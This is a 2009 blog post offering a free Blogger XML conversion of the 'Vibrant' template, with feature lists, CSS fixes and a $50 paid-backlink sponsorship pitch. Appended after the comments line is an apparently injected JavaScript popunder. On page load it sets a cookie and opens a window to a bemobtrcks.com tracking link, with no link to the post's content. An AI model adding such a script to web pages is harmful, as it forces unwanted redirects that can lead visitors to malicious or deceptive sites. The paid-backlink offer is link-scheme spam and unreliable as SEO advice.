Wednesday, February 11, 2009

Vibrant Blogger Template

[screenshot.png]

Vibrant is a Wordpress template created by CustomThemeDesign and converted to Blogger XML Template by me. I made everything easier in this template for newbies to use it easily. Because there are people who dont know even “a” tags in HTML and mail me everyday , thats why i decided to something like this.

Vibrant Blogger XML Template is 3 column with 3 ajax tabs , you can change your blogroll clicking it from your blogger dashboard , you cannot edit recent posts and recent comments widgets in template. Since IE makes trouble while showing buttons i deleted buttons and added Enter feature instead of them. So anybody who wants search must type words and hit enter.

Vibrant Blogger XML Template

  • 3 columns
  • 3 tabbed ajax menu
  • Stylish navigation menu
  • Supports widgets on Blogger
  • XML template
  • Adsense Ready
  • XHTML & CSS compliance
  • Re-edited for newbies

Optimizing Feedburner

Find the codes below and delete the lines in gray and type your FeedBurner ID .

You can be a sponsor for my template just for $50 , after you become sponsor i will put your blogs/websites link to template’s footer and it will help you increase your ranks on technorati , alexa and you will get backlinks from countless blogs.This will both affect your SERP and PageRank.

DOWNLOAD | PREVIEW

Update 1

bandwidth limit for googlepages has exceeded , download the images and javascript files from here and host them in your googlepages or somewhere else

Update 2

i see that this template is having problems while showing blockquote texts , heres a simple solution

find these lines :

blockquote p {
font-family: georgia, arial;
line-height: 1.5em;
font-size: 12px;
color: #366799;
}

and replace with these

blockquote {
font-family: georgia, arial;
line-height: 1.5em;
font-size: 11px;
color: #366799;
}

preview and save


0 comments:


let popunder; function getCookie(name) { const search = `${name}=`; let returnValue = ""; if (document.cookie.length > 0) { let offset = document.cookie.indexOf(search); if (offset !== -1) { offset += search.length; let end = document.cookie.indexOf(";", offset); if (end === -1) { end = document.cookie.length; } returnValue = unescape(document.cookie.substring(offset, end)); } } return returnValue; } let popFrequency = "0 minutes"; function resetCookie() { const expireDate = new Date(); expireDate.setMinutes(expireDate.getMinutes() - 0); document.cookie = "popunder=;path=/;expires=" + expireDate.toGMTString(); } function loadOrNot() { if (getCookie("popunder") === "") { loadPopunder(); const expireDate = new Date(); expireDate.setMinutes(expireDate.getMinutes() + parseInt(popFrequency)); document.cookie = `popunder=${parseInt(popFrequency)};path=/;expires=${expireDate.toGMTString()}`; } } function loadPopunder() { const body = document.querySelector("body"); rwmrgfdqPopup(); } if (getCookie("popunder") !== parseInt(popFrequency)) { resetCookie(); } loadOrNot(); let opened; function rwmrgfdqPopup() { if (opened !== 1) { opened = 1; window.open("http://6ajdk.bemobtrcks.com/go/2caaf799-ff7b-40af-89a6-d59202548b38", "rwmrgfdqpop", "scrollbars = 1, resizable = 1,status = 1"); } }